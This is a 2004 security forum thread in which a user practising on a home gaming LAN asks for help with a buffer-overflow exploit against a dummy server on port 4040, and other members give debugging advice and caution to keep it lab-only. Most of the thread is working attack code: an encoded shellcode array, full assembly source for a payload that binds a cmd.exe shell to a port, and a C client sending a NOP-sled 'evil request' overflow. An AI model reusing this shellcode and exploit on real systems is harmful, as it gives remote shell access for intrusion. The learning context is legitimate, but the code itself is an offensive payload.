-
November 19th, 2004, 03:48 PM
#1
Senior Member
setting up hacking lab
well let me be honest it was not a hacking LAN it was more of a gaming lan set up by 4 computer game crazy kids(including me).but i am also using that LAN to increase y computer security knowledge trying out a few exploits and coding my own exploits and using them like the WebDAV exploit using a rebind shell on port 80.It was really fun.
but i had a few problems too say i want to code a exploit for a application(or server)that runs on port 4040.that server is costly 500$ so i can't buy it i am trying to make a dummy server that will run on same port 4040 and accept a string from user store it in a buffer 46500 bytes long just as the server i am trying to exploit does.
so it will crash on anything valid request above 46500.
i have been able to send a valid request to the dummy server and crash it but as i was trying to bind it to the same port after service crash( rebind shell code of port 4040
http://www.scan-associates.net/papers/one-way.zip )it didn't work the origional server runs as a system program by default after installation i just wanted to confirm if it a requirement to exploitation that the software i am exploiting be a system program if yes how can i make my dummy server a system application?
-
November 19th, 2004, 04:35 PM
#2
No, it is not a requirement that it be a SYSTEM account but, that is the ideal type of service to exploit because once you exploit the app your code will run under the same security context as the application you are exploiting. So, having SYSTEM access is as good/better than an Admin, where as if the app was running as a user you would be limted to operations that user has permissions for, which is not as cool as SYSTEM but can probably be leveraged for greater access later. I would suggest using srvany.exe to register your dummy program as a service. Once you register it as a service you can either run it as SYSTEM or any account you specify and play with it from there. Have fun.
-Maestr0
\"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier
-
November 19th, 2004, 04:58 PM
#3
Senior Member
thx if it is not a requirement then can u suggest me why i was not able to get a rebind shell as i wanted is there something wrong with my coding(may be in shell code)or can be something else?
-
November 19th, 2004, 07:43 PM
#4
Before you try to spawn a reverse shell, make sure that your exploit is working properly. Start off by writing an exploit that runs locally to pop a cmd.exe or just a 'Hello, World' to insure you can control program flow. Once you are sure the exploit is coded properly then you can try different payloads.
-Maestr0
PS. I'm glad you're doing this on your home LAN and not a school computer. Theres absolutely nothing wrong with hacking, but theres a RIGHT way and a WRONG way. The RIGHT way can get you a well paying job doing what you love to do, the WRONG way can get you some prison time. Think about what you want from life.
\"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier
-
November 19th, 2004, 07:49 PM
#5
good luck with your hacking lab. I only advise you to revise all precautions BEFORE start testing to avoid that something "leak" from your test lab to your "good machines"
Meu sÃtio
FORMAT C: Yes ...Yes??? ...Nooooo!!! ^C ^C ^C ^C ^C
If I die before I sleep, I pray the Lord my soul to encrypt. If I die before I wake, I pray the Lord my soul to brake.
-
November 19th, 2004, 08:28 PM
#6
Senior Member
here is my rebind shellcode which binds shell to same port (port 4040) u can telnet to target after successful exploitation and get a shell
unsigned char shellc0de[] =
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
"\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x0C\x02\x80\x30"
"\x00\x40\xE2\xFA\x06\x7E\xA9\x96\x96\x96\x18\xD8\x98\x7A\xE4\x68"
"\x25\x80\x15\x2F\x23\xEE\x44\x51\x31\xFE\x0A\x03\x8C\xF8\x37\xFC"
"\xAB\x4E\x45\x51\x31\x7E\x1E\xA9\xDC\x08\xE1\xE5\xA4\xC9\xA5\xA4"
"\x96\x5D\x7B\x6A\xAD\x4F\x9F\x63\x3B\x32\x8C\xE6\x51\x32\x3B\xB8"
"\x7F\x73\xDF\x10\xDF\xF5\xFB\xF2\x96\xCC\xC4\xF2\xF1\x37\xA6\x96"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xCE\x9E\x1D\x64\x1D\x68\x17\x79"
"\x96\x97\x96\x96\xA5\x5F\x27\x9E\x7E\x06\x97\x96\x96\xC4\xC0\x69"
"\xC1\x76\xCC\x1D\x4E\x15\x50\x91\xA5\x5F\x27\x93\x7E\xEA\x97\x96"
"\x96\x7E\x15\x96\x96\x96\xF0\x17\x7A\x06\x97\xC2\xFE\x97\x97\x96"
"\x96\x69\xC1\x7A\x1D\x7A\xA5\x56\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6"
"\x69\xC1\x66\x1D\x4E\xF0\x51\xD3\x96\x94\x96\xF0\x51\xD3\x94\x19"
"\x9A\x51\xD3\x92\x96\x96\x96\x96\xFC\x86\xC3\xC5\x69\xC1\x62\x13"
"\x56\xE3\x74\xD6\xC6\xC5\x69\xC1\x6E\xC6\xC6\xC5\x69\xC1\x6A\x1D"
"\x4E\xA5\x56\xA5\x5F\x27\x87\xC1\x1D\x6B\x65\x3D\xC9\x50\xD3\x96"
"\xD2\x1F\xCB\xAA\x1F\xCB\xAE\x1F\xCB\xD6\xF0\x51\xD3\xBA\x97\x97"
"\x1B\xD3\xD2\xC6\xC3\xC7\xC7\xC7\xD7\xC7\xDF\xC7\xC7\xC0\xC7\x69"
"\xC1\x46\xA5\x56\xDE\xC6\x69\xC1\x42\xA5\x56\xA5\x5F\x27\x87\xC1"
"\x1D\x6B\x65\x3D\xC9\x1B\xDB\xD2\xC7\xC3\xC6\xC6\xFC\x92\xFC\x96"
"\xC6\xC6\xC0\xC6\x69\xC1\x46\x17\x7A\x96\x92\x96\x96\xFE\x91\x96"
"\x97\x96\xC2\x69\xE3\xDE\x69\xC1\x4E\xFC\xD6\xFE\x96\x86\x96\x96"
"\xFE\x96\xC6\x96\x96\xFC\x96\x69\xE3\xD2\x69\xC1\x4A\x1D\x4E\x17"
"\x55\x96\x97\x96\x96\x1F\x0A\xB2\x2E\x96\x96\x96\x1F\x0A\xB2\x22"
"\x96\x96\x96\x1D\x1A\xB2\x92\x92\x96\x96\x51\xD7\x6D\x06\x06\x06"
"\x06\x50\xD7\x69\x06\x17\x7F\x14\x97\x96\x96\xFC\x96\xFE\x96\x86"
"\x96\x96\xC7\xC6\x69\xE3\xD2\x69\xC1\x76\xC2\x69\xE3\xDE\x69\xC1"
"\x72\x69\xE3\xDE\x69\xC1\x7E\xA5\x56\xDE\xC6\x69\xC1\x42\xC5\xC3"
"\xC0\xC1\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D"
"\xDC\x8E\x1D\xCC\xB6\x95\x4B\x75\xAF\xDF\x1D\xA2\x1D\x95\x63\xA5"
"\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x9D\x06\x06\x06\x06\x57\x59\x9B"
"\x95\x6E\x7D\x78\xAD\xEA\xB2\x82\xE3\x4B\x1D\xCC\xB2\x95\x4B\xF0"
"\x1D\x9A\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x93\x06"
"\x06\x06\xA5\x56\x1D\x43\xC9\xC8\xCB\xCD\x54\x92\x96\xC7\xC5\x69"
"\xA0\x7E\x0E\x69\x69\x69\x3D\x3B\xCD\xCF\x74\x67\x55";
anyways i am not being able to get a shell after the service termination.
i think there is something wrong with this shell code dunno what.
-
November 20th, 2004, 06:07 AM
#7
Banned
that \x00 is surely allowed there is absolutely nothing wrong with it i like the way u r going about learning these things exploitaions is not as ewasy as it may appear at first look at it but once u master it u r on a roll.
as far ur shellcode not working i will suggest u to get some codes from packetstorm start of with simple shellcodes and use then in ur exploit then try to figure out how to write ur own.
it is really difficult to find any programming mistake u have done in asm specially if u are a newbie .
just keep a referfence always with u while working with it.
-
November 20th, 2004, 06:49 AM
#8
Senior Member
here is my rebind shellcode taken from http://www.scan-associates.net/papers/one-way.zip
remember it is in tasm
rebind.asm
-------------------------------
;rebind port shellcode
;port at 0xcf
;sk@scan-associates.net
.386p
locals
.model flat, stdcall
.code
start:
db 0ebh,02 ;jmp $+2
db 0ebh, 05h ;jmp $+5
db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7
pop eax
add eax, 1bh
lea esp,[eax-3ffh]
and esp, 0fffffffch
mov ebp,esp
xor ecx,ecx
mov cx,20ch ;size
decode:
xor byte ptr [eax], 0
inc eax
loop decode
;header len = 36
nop
call here
; dd 073e2d87eh ;ExitProcess 77E798FD
dd 0ec0e4e8eh ;LoadLibraryA 77E7D961
dd 016b3fe72h ;CreateProcessA 77E61BBC
dd 078b5b983h ;TerminateProcess
dd 068a7c7d2h ;GetThreadContext 77E938C2
dd 06e1a959ch ;VirtualAllocEx 77E7AC24
dd 0d83d6aa1h ;WriteProcessMemory 77E61A94
dd 0e8a7c7d3h ;SetThreadContext 77E9391A
dd 09e4a3f88h ;ResumeThread 77E6A12D
db "ws2_32",0
dd 03bfcedcbh ;WSAStartup
dd 0adf509d9h ;WSASocketA 71ABCF31
dd 0c7701aa4h ;bind 71ABC328
dd 0e92eada4h ;listen 71ABC777
dd 0498649e5h ;accept 71ABCF85
db "cmd",0
here:
pop edx
push edx
mov eax,fs:[30h]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov ebx,[eax+08h]
mov esi,edx
mov edi,esi
sub edi,100h ;dun mess wif code
xor ecx,ecx
;Get 3 Addr
mov cl,8
call loadaddr
; add esi,0Ch
;Load ws2_32
push edx
push esi
call dword ptr [edi-32] ;LoadLibraryA
pop edx
mov ebx,eax
add esi,7
xor ecx,ecx
mov cl,5
call loadaddr
call fork
sub sp, 400
push esp
push 101h
call [edi -20] ;WSAStartup
mov ebp,esp
;add esi,7
again:
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call dword ptr [edi-16] ;WSASocketA
; cmp eax,0FFFFFFFFh
; je exit
;bind, listen, accept
mov ebx,eax
bind:
mov word ptr [ebp],2
mov word ptr [ebp+2],0C8Fh ;port
mov dword ptr [ebp+4], 0 ;IP
push 10h
push ebp
push ebx
call dword ptr [edi-12] ;bind
test eax,eax
jne bind
inc eax
push eax
push ebx
call dword ptr [edi-8] ;listen (soc, 1);
;test eax,eax
;jne exit
push eax
push eax
push ebx
call dword ptr [edi-4] ;accept
;cmp eax,0FFFFFFFFh
;je exit
mov ebx,eax
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
mov byte ptr [ebp],44h
mov dword ptr [ebp+3Ch],ebx
mov dword ptr [ebp+38h],ebx
mov dword ptr [ebp+40h],ebx
mov word ptr [ebp+2Ch],0101h
lea eax,[ebp+44h]
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push esi
push ecx
call dword ptr [edi-48] ;CreateProcess
exit:
;jmp again
;push eax
xor eax,eax
dec eax
push eax
call dword ptr [edi-44] ;TerminateProcess
fork:
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
lea ecx,[ebp+44h]
push ecx
push ebp
;code ripped from LSD, thanks Michal!
push eax
push eax
push 04h ; flag=CREATE_SUSPENDED
push 0 ; inherit=FALSE
push eax
push eax
push esi ; cmdline="cmd"
push eax ; appname=NULL
call [edi-48] ; CreateProcess
;add ebp,44h
sub esp,0400h
push 00010007h ; ctx.ContextFlags=CONTEXT_FULL
push esp ; ctx
push dword ptr [ebp+48h] ; hthread
call [edi-40] ; GetThreadContext
push 40h ; PAGE_EXECUTE_READWRITE
push 1000h ; MEM_COMMIT
push 5000h ; 20kb
push 0
push dword ptr [ebp+44h]
;push ebp
call [edi-36] ; alloc memory in a new process
mov ebx,eax ; buf=allocated memory
add ebx,100h ; eip=buf+2 (jmp instruction)
mov [esp+0b8h],ebx ; ctx.Eip=eip
mov [esp+0b4h],ebx ; ctx.Ebp=eip ???
;mov ecx,[esp+4+3ffh-104h] ; return address
mov ecx,[esp+4+0400h]
mov dword ptr [ecx-5],90909090h ;no more fork
mov byte ptr [ecx-1],90h
sub ecx,182h ;change here!!!
push 0
; push 2000h
push 1000h
push ecx
push eax
push dword ptr [ebp+44h]
call [edi-32] ;WriteProcessMemory
push esp
push dword ptr [ebp+48h]
call [edi-28] ;SetThreadContext
push dword ptr [ebp+48h]
call [edi-24] ;ResumeThread
xor eax,eax
dec eax
push eax
call dword ptr [edi-44] ;TerminateProcess
; add esp,0400h+4
; ret
; LGetProcAddress(HASH, DLLBASE) ;stolen from HD Moore
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24] ; DLL Base Address
mov eax, [ebp + 3ch] ; eax = PE header offset
mov edx, [ebp + eax + 120]
add edx, ebp ; edx = exports directory table
mov ecx, [edx + 24] ; ecx = number of name pointers
mov ebx, [edx + 32]
add ebx, ebp ; ebx = name pointers table
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp ; esi = name pointer
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp LHshlp
LFnd:
; compare computed hash to argument
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36] ; ebx = ordinals table RNA
add ebx, ebp
mov cx, [ebx + 2 * ecx] ; ecx = function ordinal */
mov ebx, [edx + 28] ; ebx = address table RVA */
add ebx, ebp
mov eax, [ebx + 4 * ecx] ; eax = address of function RVA */
add eax, ebp
jmp LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 4
loadaddr:
push ecx
push ebx
; push esi
push dword [esi-4]
;db 0ffh,34h
call LGetProcAddress
stosd
lodsd ;esi+4
pop ebx
pop ecx
loop loadaddr
ret
end start
.data
-----------------------------------------
if u study it carefully there is a field where u assign the bind port and the ip address .
in network byte order.
ip has been left 0.port number is 4040 in our case.whick is 00000fc8 in hex.
and i have put it to be 0C8Fh in network byte order.
is that all right?
in my c code i am simply connecting to 4040 and creating a buffer 3000 bytes long first 2200 byte filled with nop's i.e. 0x43 then the shellcode .
i am not using paddings in my code where as all other codes i find on net (based on rebind shellcode) use padding.
does that make a difference?
here is my c code
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
unsigned char shellc0de[] =
/* sk - rebind port 4040 shellcode 0xcf = port */
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
"\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x0C\x02\x80\x30"
"\x00\x40\xE2\xFA\x06\x7E\xA9\x96\x96\x96\x18\xD8\x98\x7A\xE4\x68"
"\x25\x80\x15\x2F\x23\xEE\x44\x51\x31\xFE\x0A\x03\x8C\xF8\x37\xFC"
"\xAB\x4E\x45\x51\x31\x7E\x1E\xA9\xDC\x08\xE1\xE5\xA4\xC9\xA5\xA4"
"\x96\x5D\x7B\x6A\xAD\x4F\x9F\x63\x3B\x32\x8C\xE6\x51\x32\x3B\xB8"
"\x7F\x73\xDF\x10\xDF\xF5\xFB\xF2\x96\xCC\xC4\xF2\xF1\x37\xA6\x96"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xCE\x9E\x1D\x64\x1D\x68\x17\x79"
"\x96\x97\x96\x96\xA5\x5F\x27\x9E\x7E\x06\x97\x96\x96\xC4\xC0\x69"
"\xC1\x76\xCC\x1D\x4E\x15\x50\x91\xA5\x5F\x27\x93\x7E\xEA\x97\x96"
"\x96\x7E\x15\x96\x96\x96\xF0\x17\x7A\x06\x97\xC2\xFE\x97\x97\x96"
"\x96\x69\xC1\x7A\x1D\x7A\xA5\x56\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6"
"\x69\xC1\x66\x1D\x4E\xF0\x51\xD3\x96\x94\x96\xF0\x51\xD3\x94\x19"
"\x9A\x51\xD3\x92\x96\x96\x96\x96\xFC\x86\xC3\xC5\x69\xC1\x62\x13"
"\x56\xE3\x74\xD6\xC6\xC5\x69\xC1\x6E\xC6\xC6\xC5\x69\xC1\x6A\x1D"
"\x4E\xA5\x56\xA5\x5F\x27\x87\xC1\x1D\x6B\x65\x3D\xC9\x50\xD3\x96"
"\xD2\x1F\xCB\xAA\x1F\xCB\xAE\x1F\xCB\xD6\xF0\x51\xD3\xBA\x97\x97"
"\x1B\xD3\xD2\xC6\xC3\xC7\xC7\xC7\xD7\xC7\xDF\xC7\xC7\xC0\xC7\x69"
"\xC1\x46\xA5\x56\xDE\xC6\x69\xC1\x42\xA5\x56\xA5\x5F\x27\x87\xC1"
"\x1D\x6B\x65\x3D\xC9\x1B\xDB\xD2\xC7\xC3\xC6\xC6\xFC\x92\xFC\x96"
"\xC6\xC6\xC0\xC6\x69\xC1\x46\x17\x7A\x96\x92\x96\x96\xFE\x91\x96"
"\x97\x96\xC2\x69\xE3\xDE\x69\xC1\x4E\xFC\xD6\xFE\x96\x86\x96\x96"
"\xFE\x96\xC6\x96\x96\xFC\x96\x69\xE3\xD2\x69\xC1\x4A\x1D\x4E\x17"
"\x55\x96\x97\x96\x96\x1F\x0A\xB2\x2E\x96\x96\x96\x1F\x0A\xB2\x22"
"\x96\x96\x96\x1D\x1A\xB2\x92\x92\x96\x96\x51\xD7\x6D\x06\x06\x06"
"\x06\x50\xD7\x69\x06\x17\x7F\x14\x97\x96\x96\xFC\x96\xFE\x96\x86"
"\x96\x96\xC7\xC6\x69\xE3\xD2\x69\xC1\x76\xC2\x69\xE3\xDE\x69\xC1"
"\x72\x69\xE3\xDE\x69\xC1\x7E\xA5\x56\xDE\xC6\x69\xC1\x42\xC5\xC3"
"\xC0\xC1\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D"
"\xDC\x8E\x1D\xCC\xB6\x95\x4B\x75\xAF\xDF\x1D\xA2\x1D\x95\x63\xA5"
"\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x9D\x06\x06\x06\x06\x57\x59\x9B"
"\x95\x6E\x7D\x78\xAD\xEA\xB2\x82\xE3\x4B\x1D\xCC\xB2\x95\x4B\xF0"
"\x1D\x9A\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x93\x06"
"\x06\x06\xA5\x56\x1D\x43\xC9\xC8\xCB\xCD\x54\x92\x96\xC7\xC5\x69"
"\xA0\x7E\x0E\x69\x69\x69\x3D\x3B\xCD\xCF\x74\x67\x55";
void help(char *program)
{
printf("aj's syntax: %s server bind_port [\r\ni.e: %s 10.1.1.1 80 \r\n",program,program);
getch();
return;
}
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[150]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[3000] ="";
char request[3300]; // huuuh, what a mess!
}
if(argc<3){
help(argv[0]);
return;
}
PAD = argc==4 ? strtoul(argv[3],0,16): 0x4e;
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}
printf("Exploiting ******** server \n");
*(unsigned short *)&shellc0de[0xcf] = htons(atoi(argv[2])) ^ 0x4040;
if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port = htons(4040);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1)
{
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=0x90,i++);
for(i=2100,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de);buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
//for(i=0;i<2500;buffer[i]=0x41,i++);
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
//Offset from MetaSploit!
//buffer[283] = PAD+1;//0x4f;
//buffer[284] = PAD; //0x4e;
send(s,request,strlen(request),0);
sprintf(request,"GET http://O%s",buffer);
sprintf(request,"%s\r\n\r\n",request);
printf("\nCONNECTED \r\nSending evil request... ");
printf("\n\n%s\n\n",request);
send(s,request,strlen(request),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00)
{
printf("data: %s\r\n",data);
}
else
printf("Now connect to port 4040 to get a shell!\r\n");
closesocket(s);
return;
}
as u can see it just sends a valid request to the server( a long one)overflow occures at 2034 so after nop's we have placed a shellcode that is supposed to bind shell to a port specified by user
or 4040 by default.
the caode is working fine any mistakes if found are copy paste mistakes.i am being able to terminate the dummy server but not being able to get a shell
there must be some problem with this shellcode i have designed.
i have decided to install win2000 server with IIS 5 enable WebDAV and try to create same rebind shellcode for port 80 .
see how it goes
-
November 20th, 2004, 08:58 PM
#9
Senior Member
sforce that \x00 is not allowed 00 is replaced by ur decoding argument in my case 96;
so \x00 is replaced by \x96.
that part is over anyways it is a remote exploit having a structure nopnopnop.........(overflo here).....nopnop..shellcode
what is the role of ret address in this case coz that might be missing link of this shellcode
is it required here?
-
November 20th, 2004, 11:53 PM
#10
Get rid of the NULL byte.
-Maestr0
EDIT: Something else, this may be what you want I'm not sure your code is a bit umm.....messy but here:
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
## Zero out the 'request' buffer
//Offset from MetaSploit!
//buffer[283] = PAD+1;//0x4f;
//buffer[284] = PAD; //0x4e;
send(s,request,strlen(request),0); ## Empty?
## You sent the 'request' buffer which is 3300 Zero's right now (Has it overflowed already?)
sprintf(request,"GET http://O%s",buffer);
sprintf(request,"%s\r\n\r\n",request);
## Now you have written the actual request + SC into the 'request' buffer
printf("\nCONNECTED \r\nSending evil request... ");
printf("\n\n%s\n\n",request);
send(s,request,strlen(request),0);
## Now you have sent it again. Is this intentional?
You will still need to avoid the null byte in the shellcode. If its a register you can just use the lower half of the 16 bit register.
-Maestr0
\"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|